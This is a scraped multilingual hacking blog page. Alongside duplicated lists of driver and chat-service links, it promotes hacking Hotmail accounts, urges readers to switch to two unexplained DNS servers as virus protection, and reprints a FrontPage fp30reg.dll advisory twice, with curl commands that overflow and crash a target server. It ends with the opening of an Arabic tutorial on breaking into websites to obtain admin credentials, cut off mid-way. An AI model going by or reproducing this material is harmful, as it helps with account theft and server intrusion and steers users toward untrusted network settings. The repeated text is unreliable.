my mission is to help u in ur life
my pics here u found it
http://www.fileden.com/files/2008/6/1/1939264/17022008%28006%29.jpg :) dont worrey is not trojan
ok let's start my first topic
i choose for u the best web site to found your driver who u looking up have fun -eng-
je choisie pour vous les meilleur adresse web pour vos driver
http://www.driverzone.com/
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://driverpacks.net/Projects/DriverPacks/
http://driversguide.com/
http://www.totallydrivers.com/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/
Direct X:
http://www.microsoft.com/windows/directx/default.aspx
Video/graphics drivers:
Nvidia:
http://www.nvidia.com/content/drivers/drivers.asp
Ageia:
http://www.ageia.com/products/drivers.html
Ati:
http://www.ati.com/support/driver.html
Tv Tuner Cards:
http://www.tv-cards.com/drivers.php
Sound Drivers:
Creative Labs Sound Blaster:
http://us.creative.com/support/downloads/
Part Manufacturer Drivers:
Hp:
http://www.hp.com/country/us/en/support.html
Xfx:
http://www.xfxforce.com/web/support/drivers.jspa
Asus:
http://support.asus.com/faq/faq.aspx
D-link:
http://support.dlink.com/downloads/
Lg:
http://www.lge.com/support/software.jsp
Cannon:
http://www.usa.canon.com/consumer/co...wnloadIndexAct
Lexmark:
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
Chaintech:
http://www.chaintechusa.com/tw/eng/Download/
Msi:
http://www.msi.com.tw/program/suppor...t_dvr_list.php
Biostar:
http://www.biostar-usa.com/downloadmain.asp
Razer:
http://www.razerpro.com/index.php?op...d=13&Itemid=27
Abit:
http://www.abit-usa.com/downloads/
Epson:
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
Mach:
http://www.machspeed.com/products.htm
Linksys:
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
Pioneer:
http://www.pioneer-eur.com/eur/conte...t/support.html
Diamond:
http://www.diamondmm.com/newarchivelicense.php
Iomega:
https://iomega-na-en.custhelp.com/cg...ci/product.php
Mitsubishi:
http://www.mitsubishi-electric.com.a...oads/index.htm
Zboard:
http://www.zboard.com/global/downloads/drivers.asp
Belkin:
http://www.belkin.com/support/download/download.asp
Samsung:
http://www.samsung.com/support/produ...oad/index.aspx
Viewsonic:
http://www.viewsonic.com/support/drivers/index.cfm
Plextor:
http://www.plextor.com/english/suppo...s/drivers.html
Liteon-It:
http://www.liteonit.com/global/index...pper&Itemid=75
Microsoft:
http://www.microsoft.com/hardware/mo.../Download.mspx
Gigabyte:
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
Logitech:
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
Voodoo:
http://www.voodoofiles.com/
Intel:
http://downloadfinder.intel.com/scri...port_intel.asp
Cisco:
http://www.cisco.com/en/US/support/index.html
Computer Manufacturer Drivers:
Dell:
http://support.dell.com/support/downloads/index.aspx
Apple (mac) :
http://www.apple.com/downloads/macosx/drivers/
Shuttle:
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
Hp:
http://www.hp.com/country/us/en/support.html
Sony:
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
E-Machines:
http://www.emachines.com/support/product_support.html
Voodoo Game Doctor:
http://www.voodoopc.com/authorization/myaccount.aspx
Alienware:
http://support.alienware.com/Support...port_Area.aspx
Acer:
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
Toshiba:
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
Other
http://www.digg.com/software/Almost_...Hate_Searching
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
Drivers:
http://www.driverzone.com/
http://www.nvidia.com/content/drivers/drivers.asp
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://www.microsoft.com/hardware/mo.../Download.mspx
http://www.digg.com/software/Almost_...Hate_Searching
http://driverpacks.net/Projects/DriverPacks/
http://www.ageia.com/products/drivers.html
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
www.driversguide.com
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
http://downloadfinder.intel.com/scri...port_intel.asp
http://www.hp.com/country/us/en/support.html
http://support.dlink.com/downloads/
www.totallydrivers.com
http://www.lge.com/support/software.jsp
http://www.xfxforce.com/web/support/drivers.jspa
http://support.asus.com/faq/faq.aspx
http://www.pcpitstop.com/driverscan.asp
http://www.voodoofiles.com/
http://www.usa.canon.com/consumer/co...wnloadIndexAct
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
http://www.chaintechusa.com/tw/eng/Download/
http://www.msi.com.tw/program/suppor...t_dvr_list.php
http://www.biostar-usa.com/downloadmain.asp
http://www.razerpro.com/index.php?op...d=13&Itemid=27
http://www.abit-usa.com/downloads/
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
http://www.machspeed.com/products.htm
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
http://www.pioneer-eur.com/eur/conte...t/support.html
http://www.diamondmm.com/newarchivelicense.php
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
http://www.emachines.com/support/product_support.html
https://iomega-na-en.custhelp.com/cg...ci/product.php
http://www.mitsubishi-electric.com.a...oads/index.htm
http://www.zboard.com/global/downloads/drivers.asp
http://www.belkin.com/support/download/download.asp
http://www.samsung.com/support/produ...oad/index.aspx
http://www.viewsonic.com/support/drivers/index.cfm
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
http://www.plextor.com/english/suppo...s/drivers.html
http://www.liteonit.com/global/index...pper&Itemid=75
http://www.tv-cards.com/drivers.php
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
http://www.cisco.com/en/US/support/index.html
http://support.dell.com/support/downloads/index.aspx
http://www.apple.com/downloads/macosx/drivers/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/
creative sound:
http://us.creative.com/support/downloads/
direct x home page
http://www.microsoft.com/windows/directx/default.aspx
ati driver home page
http://www.ati.com/support/driver.html
__________________
الاشتراك في:
الرسائل
(
Atom
)
التصنيفات
- (حلقات متخصيصي الحمايةفيديوويندوزwindows7
- 0-day attack
- آيباد
- ابونتو
- أخبار
- ادسنس
- إضافات
- إعلان
- إعلانات
- افاست
- التحقيق الجنائي الالكتروني
- العمل ، الانترنت
- الماك
- الهاكرز الاخلاقي
- باكتراك
- بث مباشر،دورات
- برامج
- تحذيرات
- تصميم
- تكنولوجيا
- حصريات
- حلقات متخصيصي الحماية
- حماية
- حماية(حلقات متخصيصي الحماية فيديودروس حمايةGmail
- دروس الهاردوير
- دروس حماية
- دروس مبتدئين
- ربح من الانترنت
- سيسكو
- شروحات برامج
- صور
- فيديو
- فيرفوكس
- فيروسات
- فيسبوك
- كتب إليكترونية
- لينكس
- مشاكلVS حلول
- مقالات
- منتدى،مشاكل،حلول
- وثائقي
- ويندوز
- Anonymous surfing
- antivirus;keygen
- avast 6.0.1
- Backdoor
- Backtrack
- Backtrack 4
- Bifrost Section
- blogger
- botnet
- chat amp; Rooms
- cisco
- cookies
- cookies stealer
- crack
- crypters
- DDOS
- DDOser
- Download mobile messenger ebuddy
- Drivers
- E-book
- easeus
- Electroman Special Notes
- fake email
- Fake Login
- Fedora
- firefox
- firefox stealer
- game
- General
- General Hacking
- GET FACEBOOK IN YOUR MOBILE
- Gmail
- google adsense
- google chrome
- GSM Networking
- GSM trick coods
- hackin9
- Hacking in to pc software
- Hacking Tooles
- hardware
- Hardware firewall Vs Software firewall
- hotmail
- how to protect your google chrome passwords
- howto; General Hacking
- ipad
- kadhafi
- Keyloggers
- LAPTOP BAG
- linux
- live cds ;web applications;debuggers
- mac
- Magic Bluetooth Hack
- MD5
- MD5 video
- megaupload
- Menu
- Metasploit
- MS Password
- Msn
- msnbot
- Myspace
- Odesk
- password
- Phase One
- pop mail
- profile
- proxy
- PS2 hacking
- Rapidshear
- RATs
- readyboost
- rooms
- S3curity Tooles
- sagem Fast 3304
- samad-khan V4.0
- Scanners
- serial phishing;
- Skyblog
- SMS
- SMS BOMBER
- sniffers
- Social Engineering
- Software
- Spaming
- Speedupinternet
- Steganography
- submite
- THe black book Exclusive
- Trojan
- tuning قسم
- Tutorial
- Tutorials
- ubuntu
- Ubuntu; Linux
- ubutnu
- usbdumper
- virus
- Virus Maker
- VNC
- vnc's
- vpn
- wallpaper
- Web Security
- wifi hacking tooles
- wifi hakcing
- windows
- windows defender
- windows hacking
- windows live 2011
- windows vista
- windows xp
- windows7
- windows7;keygen
- xbox;howto; General Hacking
- Y-spam
- Yahoo
- Yahoo in your Mobile
- Youtube
pirater hotmail facillemnet 100%
voire http://cyberhacking.tk aller a msn hacking et suiver les instruction dsl le site et en englais si ta des blems en englais alors tempis pour toi :D
Parfois on cherche la reponse et on ne sait pas qu'elle est au fond de nous meme
enter cest 2 dns dans votre accees a distance et ne ponse jam aux virus et malawares
66.11.234.90
66.11.234.91
by mr electroman
66.11.234.90
66.11.234.91
by mr electroman
vos adresse web sur pc et gsm pour la messagerie instantané IM
bey mr electroman
Meebo & Meebo Rooms
Meebo est un service web based très populaire et depuis sa dernière version (Meebo Rooms) le succès va encore grandir. Totalement en ligne, offrant la fonction vidéos et beaucoup d’options. Le plus important est la robustesse du service qui ne connait pas vraiment de ralentissements.
http://www.meebo.com
Pibb
En comparaison avec la plupart des autres est une version light. Le service permet de créer des chatrooms, d’avoir une liste d’amis et de sauvegarder le contenu des discussions. Il a aussi la particularité d’être compatible avec OpenID.
http://pibb.com/
Tangler
Tangler est un forum en ligne actuellement en beta. L’originalité c’est qu’il permet des conversations en temps réel comparable aux services de chat en ligne. L’impression d’utiliser un forum peut permettre de conquérir un autre public. A noter qu’il propose des fonctions d’édition plus poussées que ses concurrents.
https://www.tangler.com/
Lingr
Nous ne savons pas quel avenir peut avoir ce service, mais il offre l’avantage de la simplicité. Il suffit de choisir un tag dans un nuage, d’entrer dans le chat et de commencer à discuter. Sachez néanmoins que la majorité des conversations sont en japonais.
http://www.lingr.com
Kool IM
koolim
Identique à Meebo, KooLIM aggrège les messageries en une seule page. Il est compatible avec AIM, MSN Messenger, Yahoo! Messenger, ICQ et Jabber.
Comme pour Meebo, il est possible d’ouvrir le chat dans un pop up et comme Meebo la pub a également fait son apparition.
http://www.koolim.com/
Campfire
Orienté vers les professionnels Campfire est un chat classique. Ses qualités reposent sur son intégration à Basecamp, l’archivages des conversations, la facilité d’échange de fichier et d’images.
http://campfirenow.com/
Yahoo! Messenger for the web
Yahoo a constasté le succès des chats en ligne, ils ont donc récemment rendu disponible la version web based de leur client IM. Il fonctionne sur tous les navigateurs, possède un historique complet et propose une longue liste d’émoticons.
http://webmessenger.yahoo.com/
MessengerFX
Comme Yahoo!, Windows Live Messenger dispose d’une version en ligne, celle ci n’est pas une version officielle et les auteurs ne sont pas affiliés à Microsoft. Rapide et efficace.
http://www10.messengerfx.com/
Iminent
On vous en a déja pas mal parlé, IMinent n’est pas vraiment un système de chat puisqu’il s’agit d’un module complémentaire à Windows live messenger et Yahoo!messenger. Il permet aux utilisateurs de s’envoyer en temps réels des Emovids, de courtes séquences vidéos représentant son état d’esprit.
Le service est sorti de beta privée il y a peu et est une initiative française.
http://www.iminent.com/
eBuddy
eBuddy permet d’utiliser AIM, Windows live messenger et Yahoo messenger via une interface en AJAX. Il ne supporte pas Jabber (gtalk) et est parfois lent.
http://www.ebuddy.com/
3bubbles
A la difference des autres services présentés ici (mis à part Meebo), 3bubbles se destine à être utiliser sur le blog via un widget. Ce n’est donc pas un vrai concurrent aux autres services.
http://www.3bubbles.com/
Tworl
Tword propose une manière vraiment originale d’aborder le chat et la messagerie instantanée, tandis que la signature de beaucoup de services correspond à quelque chose du style: “connectez vous à vos amis”, Tworl vous propose exactement l’inverse en vous mettant en contact aléatoirement avec une nouvelle liste d’utilisateurs. L’idée est plutôt sympa mais en aucun cas cela ne peut remplacer une vrai messagerie avec une “vrai” liste de contacts. L’usage est plutôt destiné au “fun”.
http://www.tworl.com/
Mabber
Mabber a l’avantage de fonctionner sur le web et aussi sur mobile. Il supporte AIM, ICQ, MSN, Yahoo Messenger et Gtalk. Une récente version propose le widget de chat que vous pourrez intégrer à votre blog. Vous pourrez également l’utiliser pour recevoir vos news en RSS (Mabber alert)
http://www.mabber.com/
Geesee
Geese est un concurrent direct de 3bubbles et Itzle: il n’offre pas d’espace de chat centralisé mais vous permet de créer un wigdet pour votre blog. L’outil fonctionne avec une multitude de plateforme comme Typepad, Wordpress et même netvibes.
http://www.geesee.com/
Plugoo
Plugoo est un peu un mix de tout. Il fonctionne avec AIM, MSN, Yahoo, Gtal, ICQ et JAbber et vous permet également de créer un tchat pour les visisteurs de votre blog directement depuis n’importe quel client IM. Si vous voulez maintenir une discussion avec un visiteur de votre site/blog cet outil est vraiment plus intéressant qu’un simple chat box intégré qui indique toujours que vous êtes “offline”
http://www.plugoo.com
RadiusIM
Cette startup basé à Manhattan offre un service de IM qui combine un chat en ligne avec Google Maps, vous permettant ainsi de chatter avec des personnes de votre localité. vous pourrez agrégrer plusieurs pseudos IM de différentes plateformes. Les logins sont sauvegardés par Radius IM qui vous permet ainsi de ne pas avoir à retaper tous vos passwords/logins. (ils viennent de lever 500.000$ auprès de fonds d’investussement la semaine dernière)
http://www.radiusim.com
Itzle
Légèrement différent des autres services IM: Itzle vous permet de chater avec d’autres utilisateurs sur des pages webs par l’intermédiaire d’un avatar. pas de download nécessaire mais juste un “bookmarklet” sur lequel il faut cliquer pour faire apparaitre votre avatar. On trouve le service innovant mais on doute encore de son utilité.
http://www.itzle.com
Gabbly
Gabbly est un chat box en ajax pour blogs et sites web. Il vous permet d’avoir un chat sur votre propre domaine (avec une extension) en y incluant un iFrame.
http://www.gabbly.com
ZohoChat
Un des outils de la suite office Zoho, Zoho chats vous permet de chater avec d’autres utilisateurs sur votre site/blog. La fonction embed utilise un iFrame (qui ne marche donc pas sur toutes les plateformes/sites), il manque également la fonctionnalité d’aggrégation des différents pseudos des différents services de messagerie. Ceci étant dit c’est un moyen super sumple pour mettre en place un chat surtout si vous utilisez couramment la suite Zoho.
http://www.zohochat.com
Meebo & Meebo Rooms
Meebo est un service web based très populaire et depuis sa dernière version (Meebo Rooms) le succès va encore grandir. Totalement en ligne, offrant la fonction vidéos et beaucoup d’options. Le plus important est la robustesse du service qui ne connait pas vraiment de ralentissements.
http://www.meebo.com
Pibb
En comparaison avec la plupart des autres est une version light. Le service permet de créer des chatrooms, d’avoir une liste d’amis et de sauvegarder le contenu des discussions. Il a aussi la particularité d’être compatible avec OpenID.
http://pibb.com/
Tangler
Tangler est un forum en ligne actuellement en beta. L’originalité c’est qu’il permet des conversations en temps réel comparable aux services de chat en ligne. L’impression d’utiliser un forum peut permettre de conquérir un autre public. A noter qu’il propose des fonctions d’édition plus poussées que ses concurrents.
https://www.tangler.com/
Lingr
Nous ne savons pas quel avenir peut avoir ce service, mais il offre l’avantage de la simplicité. Il suffit de choisir un tag dans un nuage, d’entrer dans le chat et de commencer à discuter. Sachez néanmoins que la majorité des conversations sont en japonais.
http://www.lingr.com
Kool IM
koolim
Identique à Meebo, KooLIM aggrège les messageries en une seule page. Il est compatible avec AIM, MSN Messenger, Yahoo! Messenger, ICQ et Jabber.
Comme pour Meebo, il est possible d’ouvrir le chat dans un pop up et comme Meebo la pub a également fait son apparition.
http://www.koolim.com/
Campfire
Orienté vers les professionnels Campfire est un chat classique. Ses qualités reposent sur son intégration à Basecamp, l’archivages des conversations, la facilité d’échange de fichier et d’images.
http://campfirenow.com/
Yahoo! Messenger for the web
Yahoo a constasté le succès des chats en ligne, ils ont donc récemment rendu disponible la version web based de leur client IM. Il fonctionne sur tous les navigateurs, possède un historique complet et propose une longue liste d’émoticons.
http://webmessenger.yahoo.com/
MessengerFX
Comme Yahoo!, Windows Live Messenger dispose d’une version en ligne, celle ci n’est pas une version officielle et les auteurs ne sont pas affiliés à Microsoft. Rapide et efficace.
http://www10.messengerfx.com/
Iminent
On vous en a déja pas mal parlé, IMinent n’est pas vraiment un système de chat puisqu’il s’agit d’un module complémentaire à Windows live messenger et Yahoo!messenger. Il permet aux utilisateurs de s’envoyer en temps réels des Emovids, de courtes séquences vidéos représentant son état d’esprit.
Le service est sorti de beta privée il y a peu et est une initiative française.
http://www.iminent.com/
eBuddy
eBuddy permet d’utiliser AIM, Windows live messenger et Yahoo messenger via une interface en AJAX. Il ne supporte pas Jabber (gtalk) et est parfois lent.
http://www.ebuddy.com/
3bubbles
A la difference des autres services présentés ici (mis à part Meebo), 3bubbles se destine à être utiliser sur le blog via un widget. Ce n’est donc pas un vrai concurrent aux autres services.
http://www.3bubbles.com/
Tworl
Tword propose une manière vraiment originale d’aborder le chat et la messagerie instantanée, tandis que la signature de beaucoup de services correspond à quelque chose du style: “connectez vous à vos amis”, Tworl vous propose exactement l’inverse en vous mettant en contact aléatoirement avec une nouvelle liste d’utilisateurs. L’idée est plutôt sympa mais en aucun cas cela ne peut remplacer une vrai messagerie avec une “vrai” liste de contacts. L’usage est plutôt destiné au “fun”.
http://www.tworl.com/
Mabber
Mabber a l’avantage de fonctionner sur le web et aussi sur mobile. Il supporte AIM, ICQ, MSN, Yahoo Messenger et Gtalk. Une récente version propose le widget de chat que vous pourrez intégrer à votre blog. Vous pourrez également l’utiliser pour recevoir vos news en RSS (Mabber alert)
http://www.mabber.com/
Geesee
Geese est un concurrent direct de 3bubbles et Itzle: il n’offre pas d’espace de chat centralisé mais vous permet de créer un wigdet pour votre blog. L’outil fonctionne avec une multitude de plateforme comme Typepad, Wordpress et même netvibes.
http://www.geesee.com/
Plugoo
Plugoo est un peu un mix de tout. Il fonctionne avec AIM, MSN, Yahoo, Gtal, ICQ et JAbber et vous permet également de créer un tchat pour les visisteurs de votre blog directement depuis n’importe quel client IM. Si vous voulez maintenir une discussion avec un visiteur de votre site/blog cet outil est vraiment plus intéressant qu’un simple chat box intégré qui indique toujours que vous êtes “offline”
http://www.plugoo.com
RadiusIM
Cette startup basé à Manhattan offre un service de IM qui combine un chat en ligne avec Google Maps, vous permettant ainsi de chatter avec des personnes de votre localité. vous pourrez agrégrer plusieurs pseudos IM de différentes plateformes. Les logins sont sauvegardés par Radius IM qui vous permet ainsi de ne pas avoir à retaper tous vos passwords/logins. (ils viennent de lever 500.000$ auprès de fonds d’investussement la semaine dernière)
http://www.radiusim.com
Itzle
Légèrement différent des autres services IM: Itzle vous permet de chater avec d’autres utilisateurs sur des pages webs par l’intermédiaire d’un avatar. pas de download nécessaire mais juste un “bookmarklet” sur lequel il faut cliquer pour faire apparaitre votre avatar. On trouve le service innovant mais on doute encore de son utilité.
http://www.itzle.com
Gabbly
Gabbly est un chat box en ajax pour blogs et sites web. Il vous permet d’avoir un chat sur votre propre domaine (avec une extension) en y incluant un iFrame.
http://www.gabbly.com
ZohoChat
Un des outils de la suite office Zoho, Zoho chats vous permet de chater avec d’autres utilisateurs sur votre site/blog. La fonction embed utilise un iFrame (qui ne marche donc pas sur toutes les plateformes/sites), il manque également la fonctionnalité d’aggrégation des différents pseudos des différents services de messagerie. Ceci étant dit c’est un moyen super sumple pour mettre en place un chat surtout si vous utilisez couramment la suite Zoho.
http://www.zohochat.com
ثغرة في نظام frontpage extension
mr electroman
COMMAND
FrontPage Server Extensions
SYSTEMS AFFECTED
FrontPage Server Extensions; IIS 4, 5
PROBLEM
There has been several issues with Front Page Server Extensions.
One of them was reported by Internet Security Systems Security
Alert. ISS X-Force is aware of a serious vulnerability that may
allow remote attackers to launch Denial of Service (DoS) attacks
against, or compromise Microsoft Internet Information Server
(IIS) installations. This vulnerability exists in the Visual
Studio Remote Application Deployment (RAD) component of FrontPage
Server Extensions.
Microsoft FrontPage is a Web site design and management
application. The FrontPage Server Extensions (FPSE) package is
included in IIS versions 4.0 and 5.0 to help integrate FrontPage
with IIS. IIS servers may be vulnerable if the Visual Studio RAD
component of FPSE is installed. This component allows Web site
designers who use Microsoft InterDev to actively register and
unregister COM components on the IIS server.
The Visual Studio RAD component includes a vulnerable Dynamic Link
Library (DLL), fp30reg.dll. This DLL does not properly parse long
arguments. Attackers may supply the DLL with an overly long
request and may be able to run arbitrary code or bring down the
server. Any commands executed on the server are executed under
the IUSR_machinename security context, and in certain
circumstances under the System context.
Following was by NSFOCUS Security Advisory SA2001-03. NSFOCUS
security team has found also a buffer overflow vulnerability in
Microsoft FrontPage 2000 Server Extension, which can be exploited
to execute arbitrary code by a remote attacker. Microsoft
FrontPage 2000 Server Extension has a Dynamic Link Library (.DLL)
File: "fp30reg.dll" that exists a buffer overflow vulnerability.
When fp30reg.dll receives a URL request that is longer than 258
bytes, a stack buffer overflow will occur. Exploiting this
vulnerability successfully, an attacker can remotely execute
arbitrary code on the server running MS FPSE 2000.
In case that fp30reg.dll receives an invalid parameter(method),
it will return an error message:
"The server is unable to perform the method [parameter provided by the user] at this time"
This error message will be saved in a fixed length stack buffer.
fp30reg.dll calls USER32.wsprintfA() to form return message.
Because there is no checkup for the length of data supplied by
the user, the destination buffer can be overwritten. An attacker
can rewrite some important memory address like exception structure
or saved EIP to change program flow.
Format string used by USER32.wsprintfA() is:
HTTP Error 501
The server is unable to perform the method %s at this time.
It is also saved in stack and its address is at (target buffer
address + 256 bytes), so the format string will be rewritten when
the overflow occurs. The attacker should manage to finish
copying. If an attacker overwrite the buffer with random data,
IIS service will fail. In this case, IIS 5.0 can be automatically
self-restarted, but IIS 4.0 needs to be restarted manually.
Exploiting this vulnerability successfully, an attacker can obtain
the privilege of IWAM_machinename account in IIS 5.0 or Local
SYSTEM account in IIS 4.0 by default.
There is a copy of fp30reg.dll in another directory:
Program FilesCommon FilesMicrosoft SharedWeb Server Extensions bin
whose name is fp4areg.dll.
Exploiting some other vulnerabilities like unicode bug, an
attacker will be able to access this file.
Overflow won't occur in case that the provided parameter has only
258 bytes:
$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x258'`
HTTP Error 501
The server is unable to perform the method AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA at this time.
In case that it is longer than 258 bytes, an buffer overflow will
occur:
$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x259'`
ErrorThe remote procedure call
failed.
There is a proof of concept code for this issue:
http://www.nsfocus.com/proof/fpse2000ex.c
SOLUTION
ISS X-Force recommends that all Web site administrators review the
appropriate IIS Security Checklist from Microsoft, and verify
that their IIS Web servers have been configured securely. These
documents outline how to correctly configure an externally facing
IIS Web server. IIS servers that have been configured securely,
using the Checklists, are not vulnerable to many of the recent
and widely publicized remote IIS exploits.
The IIS Security Checklists are available here:
http://www.microsoft.com/technet/security/iischk.asp
http://www.microsoft.com/technet/security/iis5chk.asp
Patch for Microsoft Windows NT version 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038
For Microsoft Windows 2000 Professional, Server and Advanced
Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727
For more information on this vulnerability, please refer to the
Microsoft Security Bulletin at:
http://www.microsoft.com/technet/security/bulletin/MS01-035.asp
Basically, installing MS01-035 causes the IIS MMC to close when
you click on the server extensions tab under Windows 2000
Advanced Server on SP2 (with all current hotfixes). Uninstalling
MS01-035 fixes the problem, but opens up the security hole. When
the new patch is available, MS will re-release their bulletin.
COMMAND
FrontPage Server Extensions
SYSTEMS AFFECTED
FrontPage Server Extensions; IIS 4, 5
PROBLEM
There has been several issues with Front Page Server Extensions.
One of them was reported by Internet Security Systems Security
Alert. ISS X-Force is aware of a serious vulnerability that may
allow remote attackers to launch Denial of Service (DoS) attacks
against, or compromise Microsoft Internet Information Server
(IIS) installations. This vulnerability exists in the Visual
Studio Remote Application Deployment (RAD) component of FrontPage
Server Extensions.
Microsoft FrontPage is a Web site design and management
application. The FrontPage Server Extensions (FPSE) package is
included in IIS versions 4.0 and 5.0 to help integrate FrontPage
with IIS. IIS servers may be vulnerable if the Visual Studio RAD
component of FPSE is installed. This component allows Web site
designers who use Microsoft InterDev to actively register and
unregister COM components on the IIS server.
The Visual Studio RAD component includes a vulnerable Dynamic Link
Library (DLL), fp30reg.dll. This DLL does not properly parse long
arguments. Attackers may supply the DLL with an overly long
request and may be able to run arbitrary code or bring down the
server. Any commands executed on the server are executed under
the IUSR_machinename security context, and in certain
circumstances under the System context.
Following was by NSFOCUS Security Advisory SA2001-03. NSFOCUS
security team has found also a buffer overflow vulnerability in
Microsoft FrontPage 2000 Server Extension, which can be exploited
to execute arbitrary code by a remote attacker. Microsoft
FrontPage 2000 Server Extension has a Dynamic Link Library (.DLL)
File: "fp30reg.dll" that exists a buffer overflow vulnerability.
When fp30reg.dll receives a URL request that is longer than 258
bytes, a stack buffer overflow will occur. Exploiting this
vulnerability successfully, an attacker can remotely execute
arbitrary code on the server running MS FPSE 2000.
In case that fp30reg.dll receives an invalid parameter(method),
it will return an error message:
"The server is unable to perform the method [parameter provided by the user] at this time"
This error message will be saved in a fixed length stack buffer.
fp30reg.dll calls USER32.wsprintfA() to form return message.
Because there is no checkup for the length of data supplied by
the user, the destination buffer can be overwritten. An attacker
can rewrite some important memory address like exception structure
or saved EIP to change program flow.
Format string used by USER32.wsprintfA() is:
HTTP Error 501
NOT IMPLEMENTED
The server is unable to perform the method %s at this time.
It is also saved in stack and its address is at (target buffer
address + 256 bytes), so the format string will be rewritten when
the overflow occurs. The attacker should manage to finish
copying. If an attacker overwrite the buffer with random data,
IIS service will fail. In this case, IIS 5.0 can be automatically
self-restarted, but IIS 4.0 needs to be restarted manually.
Exploiting this vulnerability successfully, an attacker can obtain
the privilege of IWAM_machinename account in IIS 5.0 or Local
SYSTEM account in IIS 4.0 by default.
There is a copy of fp30reg.dll in another directory:
Program FilesCommon FilesMicrosoft SharedWeb Server Extensions bin
whose name is fp4areg.dll.
Exploiting some other vulnerabilities like unicode bug, an
attacker will be able to access this file.
Overflow won't occur in case that the provided parameter has only
258 bytes:
$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x258'`
HTTP Error 501
NOT IMPLEMENTED
The server is unable to perform the method AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA at this time.
In case that it is longer than 258 bytes, an buffer overflow will
occur:
$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e 'print "A"x259'`
ErrorThe remote procedure call
failed.
There is a proof of concept code for this issue:
http://www.nsfocus.com/proof/fpse2000ex.c
SOLUTION
ISS X-Force recommends that all Web site administrators review the
appropriate IIS Security Checklist from Microsoft, and verify
that their IIS Web servers have been configured securely. These
documents outline how to correctly configure an externally facing
IIS Web server. IIS servers that have been configured securely,
using the Checklists, are not vulnerable to many of the recent
and widely publicized remote IIS exploits.
The IIS Security Checklists are available here:
http://www.microsoft.com/technet/security/iischk.asp
http://www.microsoft.com/technet/security/iis5chk.asp
Patch for Microsoft Windows NT version 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038
For Microsoft Windows 2000 Professional, Server and Advanced
Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727
For more information on this vulnerability, please refer to the
Microsoft Security Bulletin at:
http://www.microsoft.com/technet/security/bulletin/MS01-035.asp
Basically, installing MS01-035 causes the IIS MMC to close when
you click on the server extensions tab under Windows 2000
Advanced Server on SP2 (with all current hotfixes). Uninstalling
MS01-035 fixes the problem, but opens up the security hole. When
the new patch is available, MS will re-release their bulletin.
ثغرة Front Page
الكاتب : ^SpY^
الاختراق عن طريق ثغرة Front page
________________________________________
أولا :
.......قبل قرائتك للموضوع يجب أن يكون لديك فكرة ولو بسيطة عن :
1- Front page Server Extensions
2- ثغرات الفرونت بيدج و ليس كيفية استعمالها
3- الموضوع للمبتدئين فاذا لم تكن مبتدأ ... فأنصحك بعدم تضييع وقتك معه
نخش في الموضوع:
طبعا ثغرات الفرونت بيدج تكون موجودة في الأنظمة التي يدعم سيرفراتها الFront page , وهذه الثغرات تمكن المخترق من الوصول لملف
الuser name و الpassword الخاص بالAdmin بتاع الموقع .
ولعلك تتسائل ما هذه الملفات ؟ ... حسننا تكون الملفات على هذا النحو والتي تحتوي علىuser name و password الخاص بالAdmin :
